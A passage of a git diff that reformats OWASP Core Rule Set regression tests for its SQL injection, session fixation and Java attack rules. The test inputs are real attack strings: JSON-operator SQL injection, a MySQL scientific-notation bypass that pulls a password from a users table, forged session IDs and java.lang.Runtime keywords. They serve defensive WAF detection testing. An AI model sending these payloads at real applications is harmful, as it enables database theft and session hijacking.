"/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 31 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 32 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 33 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 34 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 35 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 36 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml index 8e1cbfb5d..091b97236 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml @@ -2,40 +2,39 @@ meta: author: "Xhoenix, azurit" description: MySQL Scientific Notation bypass payloads Detection - enabled: true - name: 942560.yaml +rule_id: 942560 tests: - - test_title: 942560-1 + - test_id: 1 desc: "Positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" - version: HTTP/1.0 - output: - log_contains: id "942560" - - test_title: 942560-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" + version: HTTP/1.0 + output: + log: + expect_ids: [942560] + - test_id: 2 desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "foo=1.e(ascii)" - version: HTTP/1.0 - output: - log_contains: id "942560" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "foo=1.e(ascii)" + version: HTTP/1.0 + output: + log: + expect_ids: [942560] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 1713247d8..56e504cef 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -1,49 +1,47 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943100.yaml +rule_id: 943100 tests: - - test_title: 943100-1 + - test_id: 1 desc: Session Fixation Attack (943100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get/foo.php?bar=blah' - version: HTTP/1.1 - output: - log_contains: id "943100" - - test_title: 943100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get/foo.php?bar=blah' + version: HTTP/1.1 + output: + log: + expect_ids: [943100] + - test_id: 2 desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/foo.php?test=.cookie;expires=" - version: HTTP/1.1 - output: - log_contains: id "943100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/foo.php?test=.cookie;expires=" + version: HTTP/1.1 + output: + log: + expect_ids: [943100] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index 0802f4f46..f0a02000d 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -1,85 +1,83 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943110.yaml +rule_id: 943110 tests: - - test_title: 943110-1 + - test_id: 1 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http://www.attackersite.com/test - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943110" - - test_title: 943110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http://www.attackersite.com/test + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + expect_ids: [943110] + - test_id: 2 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://localhost.attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://localhost.attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log: + expect_ids: [943110] + - test_id: 3 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log: + expect_ids: [943110] + - test_id: 4 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Referer: http://localhost/test - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - no_log_contains: id "943110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Referer: http://localhost/test + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + no_expect_ids: [943110] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index 9350814a3..33a874629 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -1,27 +1,25 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943120.yaml +rule_id: 943120 tests: - - test_title: 943120-1 + - test_id: 1 desc: Session Fixation Attack (943120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943120" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + expect_ids: [943120] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml index 9cbf3d272..89a8f7567 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -1,27 +1,25 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944000.yaml" - description: "Description" +rule_id: 944000 tests: - - test_title: 944000-1 + - test_id: 1 desc: Using text/plain Content-Type which do not have any bodyprocessor associated stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - uri: "/post" - data: "test=value" - output: - no_log_contains: "id \"944000\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + uri: "/post" + data: "test=value" + output: + log: + no_expect_ids: [944000] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml index 80705038d..c1a60d1d6 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml @@ -1,373 +1,371 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944100.yaml" - description: "Description" +rule_id: 944100 tests: - - test_title: 944100-1 + - test_id: 1 desc: Argument test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944100] + - test_id: 2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" - - test_title: 944100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944100] + - test_id: 3 desc: Argument name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log: + expect_ids: [944100] + - test_id: 4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log: + expect_ids: [944100] + - test_id: 5 desc: Cookie test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 7 desc: Cookie name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.ProcessBuilder=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 9 desc: Request header test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-11 + - input: + dest_addr: "127.0.0.1" + port: 